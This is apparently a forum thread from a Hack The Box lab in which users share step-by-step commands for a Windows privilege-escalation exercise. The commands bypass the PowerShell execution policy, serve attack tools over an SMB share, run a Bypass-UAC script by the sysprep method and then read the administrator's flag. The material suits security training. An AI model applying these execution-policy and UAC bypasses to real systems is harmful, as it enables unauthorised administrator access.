Can’t execute any .ps1 onf the target machine.
I was able to get user flag.txt, and access the share. But when I try to run PowerUp.ps1, the system says that scripts can’t run on the current system??
Stuck here. Could someone help me out?
1 Like
same issue unable to import module…
Set-ExecutionPolicy Bypass -Scope Process
We can import now
1 Like
for anyone stuck at this point:
before starting windows:
from linux:
cd /home/htb-student/tools
sudo -s ( rdp pass)
smbserver.py -smb2support share $(pwd)
launch windows
from cmd:
powershell -ep bypass
xcopy \10.13.38.95\share\bypass-uac.ps1
after
.\bypass-uac.ps1 This allows you to go ahead and start powerup.ps1
start powerup
after
cmd : runas /user:backdor cmd
notepad bypassuac.txt
copy and pastehttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Bypass-UAC/Bypass-UAC.ps1
then save it as .ps1
back to the terminal
type: powershell
in the same dir where bypas.ps1 is
import-module .\bypass.ps1
powershell -ep bypass
bypass-uac -method uacmethodsysprep
should open another terminal:
digital only
c:\users\administrator\desktop\flag.txt et voila:
2 afternoons saved 